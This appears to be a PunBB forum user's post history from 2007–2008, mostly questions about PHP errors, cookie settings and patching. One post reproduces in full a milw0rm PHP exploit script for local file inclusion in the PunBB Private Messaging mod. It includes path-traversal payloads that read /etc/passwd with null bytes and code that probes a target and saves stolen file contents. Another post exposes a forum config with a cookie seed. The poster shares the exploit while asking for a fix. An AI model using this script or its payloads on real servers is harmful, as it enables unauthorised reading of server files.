It doesn't work. Dante
1 2008-11-20 17:49
Re: Punbb <= 1.2.19 XSS Vulnerabilities (2 replies, posted in PunBB 1.2 bug reports)
2 2008-11-20 17:47
Re: PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit (4 replies, posted in PunBB 1.2 modifications, plugins and integrations)
register_globals = 1
magic_quotes_gpc = 1I know, it's rare that they are off... But I'd prefere be safe with PunBB 1.2.20 
Dante
3 2008-11-19 21:34
Topic: PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit (4 replies, posted in PunBB 1.2 modifications, plugins and integrations)
<?php
error_reporting(0);
ini_set("default_socket_timeout",5);
/*
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
-----------------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/files.php?pid=52
download cms http://punbb.org
-----------------------------------------------------------
register_globals = 1
magic_quotes_gpc = 1
Directory (files/include/pms)
functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
profile_send.php?pun_user[language]=../../../../../etc/passwd
viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd
../../etc/passwd and nullbyte
File (files/include/pms/functions_navlinks.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared :D you can include any file
functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/header_new_messages.php)
1. <?php
2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['g_pm'] isn't declared
$pun_config['o_pms_enabled'] isn't declared
header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00
-------------------------------------------------------------------
File (files/include/pms/profile_send.php))
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
profile_send.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/viewtopic_PM-link.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
Usage: php [punbb.php] [host/path] [mode]
php [punbb.php] [host/path] [save]
php [punbb.php] [host/path] [NULL]
Example:
php punbb.php localhost/punbb save
php punbb.php localhost/punbb
NOTE: Don't add me on MSN Messenger
*/
$exploit = new Exploit;
$domain = $argv[1];
$mymode = $argv[2];
$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain,$mymode);
class Exploit
{
function http_request($host,$data)
{
if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
{
echo "socket_create() error!\r\n";
exit;
}
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
{
echo "socket_set_option() error!\r\n";
exit;
}
if(!socket_connect($socket,$host,80))
{
echo "socket_connect() error!\r\n";
exit;
}
if(!socket_write($socket,$data,strlen($data)))
{
echo "socket_write() errror!\r\n";
exit;
}
while($get = socket_read($socket,1024,PHP_NORMAL_READ))
{
$content .= $get;
}
socket_close($socket);
$array = array(
'HTTP/1.1 404 Not Found',
'HTTP/1.1 300 Multiple Choices',
'HTTP/1.1 301 Moved Permanently',
'HTTP/1.1 302 Found',
'HTTP/1.1 304 Not Modified',
'HTTP/1.1 400 Bad Request',
'HTTP/1.1 401 Unauthorized',
'HTTP/1.1 402 Payment Required',
'HTTP/1.1 403 Forbidden',
'HTTP/1.1 405 Method Not Allowed',
'HTTP/1.1 406 Not Acceptable',
'HTTP/1.1 407 Proxy Authentication Required',
'HTTP/1.1 408 Request Timeout',
'HTTP/1.1 409 Conflict',
'HTTP/1.1 410 Gone',
'HTTP/1.1 411 Length Required',
'HTTP/1.1 412 Precondition Failed',
'HTTP/1.1 413 Request Entity Too Large',
'HTTP/1.1 414 Request-URI Too Long',
'HTTP/1.1 415 Unsupported Media Type',
'HTTP/1.1 416 Request Range Not Satisfiable',
'HTTP/1.1 417 Expectation Failed',
'HTTP/1.1 Retry With',
);
for($i=0;$i<=count($array);$i++)
if(eregi($array[$i],$content))
{
return ("$array[$i]\r\n");
break;
}
else
{
return ("$content\r\n");
break;
}
}
function is_vulnerable($host)
{
$host = explode('/',$host);
$header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
$header .= "Host: $host[0]\r\n";
$header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .= "Accept-Language: en-us,en;q=0.5\r\n";
$header .= "Accept-Encoding: gzip,deflate\r\n";
$header .= "Connection: close\r\n\r\n";
if(stristr($this->http_request($host[0],$header),"\\'"))
{
echo "[+] Magic Quotes GPC/Register Globals On!\n";
echo "[+] Exploit Failed!\n";
exit;
}
else
{
return false;
}
}
function starting()
{
global $argv;
if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
{
echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
echo " -----------------------------------------------------------\r\n";
echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
echo "[+] Usage: php $argv[0] [host/path] \r\n";
exit;
}
}
function exploiting($host,$mode)
{
$host = explode('/',$host);
$i = 0;
echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
echo "[+] Local File: ";
$file = stripslashes(trim(fgets(STDIN)));
if(empty($file)) die("you fail");
$array = array (
"functions_navlinks.php?pun_user[language]=$file",
"profile_send.php?pun_user[language]=$file",
"viewtopic_PM-link.php?pun_user[language]=$file",
"header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
);
$write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
$write .= "Host: $host[0]\r\n";
$write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$write .= "Accept-Language: en-us,en;q=0.5\r\n";
$write .= "Accept-Encoding: gzip,deflate\r\n";
$write .= "Connection: close\r\n\r\n";
if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
{
$i++;
}
else
{
if($mode == "save")
{
$rand = rand(0,99999);
fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
echo "[+] File $rand Saved Successfully!\r\n";
echo "[+] Exploit Terminated!\r\n";
exit;
}
else
{
echo $this->http_request($host[0],$write);
exit;
}
}
}
}
# milw0rm.com [2008-11-19]I'm not able to fix... Someone can Fix the interested file please? Dante
4 2008-11-14 21:11
Re: Only An Error (4 replies, posted in PunBB 1.2 bug reports)
Sorry... It's right. Dante
5 2008-11-11 20:16
Topic: Only An Error (4 replies, posted in PunBB 1.2 bug reports)
<div id="profile" class="block2col">
<div class="blockmenu">
<h2><span><?php echo $lang_profile['Profile menu'] ?></span></h2>
<div class="box">
<div class="inbox">
<ul>
<li<?php if ($page == 'essentials') echo ' class="isactive"'; ?>><a href="profile.php?section=essentials&id=<?php echo $id ?>"><?php echo $lang_profile['Section essentials'] ?></a></li>
<li<?php if ($page == 'personal') echo ' class="isactive"'; ?>><a href="profile.php?section=personal&id=<?php echo $id ?>"><?php echo $lang_profile['Section personal'] ?></a></li>
<li<?php if ($page == 'messaging') echo ' class="isactive"'; ?>><a href="profile.php?section=messaging&id=<?php echo $id ?>"><?php echo $lang_profile['Section messaging'] ?></a></li>
<li<?php if ($page == 'personality') echo ' class="isactive"'; ?>><a href="profile.php?section=personality&id=<?php echo $id ?>"><?php echo $lang_profile['Section personality'] ?></a></li>
<li<?php if ($page == 'display') echo ' class="isactive"'; ?>><a href="profile.php?section=display&id=<?php echo $id ?>"><?php echo $lang_profile['Section display'] ?></a></li>
<li<?php if ($page == 'privacy') echo ' class="isactive"'; ?>><a href="profile.php?section=privacy&id=<?php echo $id ?>"><?php echo $lang_profile['Section privacy'] ?></a></li>
<?php if ($pun_user['g_id'] == PUN_ADMIN || ($pun_user['g_id'] == PUN_MOD && $pun_config['p_mod_ban_users'] == '1')): ?> <li<?php if ($page == 'admin') echo ' class="isactive"'; ?>><a href="profile.php?section=admin&id=<?php echo $id ?>"><?php echo $lang_profile['Section admin'] ?></a></li>
<?php endif; ?> </ul>
</div>
</div>
</div>
<?php./include/functions.php
Line: 545 -> 550
<li -> <li>
Dante
6 2008-09-11 13:03
Topic: $this-> (1 replies, posted in PunBB 1.2 bug reports)
Hello... I wanto to ask you: what is this?
$this->In the file mysql.php
function query($sql, $unbuffered = false)
{
if (defined('PUN_SHOW_QUERIES'))
$q_start = get_microtime();
if ($unbuffered)
$this->query_result = @mysql_unbuffered_query($sql, $this->link_id);
else
$this->query_result = @mysql_query($sql, $this->link_id);
if ($this->query_result)
{
if (defined('PUN_SHOW_QUERIES'))
$this->saved_queries[] = array($sql, sprintf('%.5f', get_microtime() - $q_start));
++$this->num_queries;
return $this->query_result;
}
else
{
if (defined('PUN_SHOW_QUERIES'))
$this->saved_queries[] = array($sql, 0);
return false;
}
}I am trying to make a page, but I have this error:
Notice: Undefined variable: this in c:\program files\easyphp1-8\www\prova_tabelle.php on line 64And in that Line there is this php code:
60 function num_fields($query_id = 0)
61 {
62 global $db_type;
63 if (!$query_id)
64 $query_id = $this->query_result;
65 switch($db_type)
66 {
67 case 'mysql':
68 return ($query_id) ? @mysql_num_fields($query_id) : false;
69 break;
70 case 'mysqli':
71 return ($query_id) ? @mysqli_num_fields($query_id) : false;
72 }
73 }Dante
7 2008-06-23 09:01
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
thank you... but I want to learn to use the patch... I use windows. Dante
8 2008-06-19 23:35
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
Smartys wrote:
This was a bug that was fixed in 1.2.17
Yeah, I've seen later... But, how can i use the patch (1.2.15 -> 1.2.17)? I'm not be able to apply it... Dante
9 2008-06-16 17:41
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
Ok, Thanks. Dante
P.S.: Ehm... I have 1.2.15 version of PunBB. How can I upgrade my version of PunBB? The patch does not work... And I have to upgrade Login.php page, but I have installed on it some my mods... I do not want to replace it with login.php in v1.2.17. Dante
10 2008-06-16 17:18
Topic: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
Smartys, i have just sent you an email... Read it please Dante
11 2008-01-01 18:27
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Ok... Thanks a lot Smartys! Dante
12 2008-01-01 18:08
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Oh, I didn't see... But I don't want to see in PHP.net xD xD
$cookie_secure = 1;Why I can't logged in? O.o in little words xD If I am logged in... I see normally the Forum... But if I am not logged in I can't log in O.o Dante
13 2008-01-01 17:56
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Yes, but Smartys answer me please xD Dante
14 2008-01-01 17:48
Topic: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
<?php
$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'punbb';
$db_username = 'Dante90';
$db_password = '';
$db_prefix = '';
$p_connect = false;
$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'd6ckb5eb';
define('PUN', 1);What for:
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'd6ckb5eb';? If this:
$cookie_secure = 0;is:
$cookie_secure = 1;I can't logged in my forum. Why? And what is it $cookie_seed? Dante
15 2007-11-20 15:57
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
Thank you for the Thanks I sent you an other email... 
This time it isn't a dangerous Bug xD Dante
16 2007-11-19 14:35
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
But it was the Fix... O__O Dante
17 2007-11-18 20:51
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
[Dante: we know, I've talked to you about this -Smartys]
18 2007-11-03 13:40
Topic: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
I found a Bug on PunBB... It is fatal. I want the fix... I can not post the Exploit, it is dangerous. ADMINS, contact me... dante90.dmc4@hotmail.it... Dante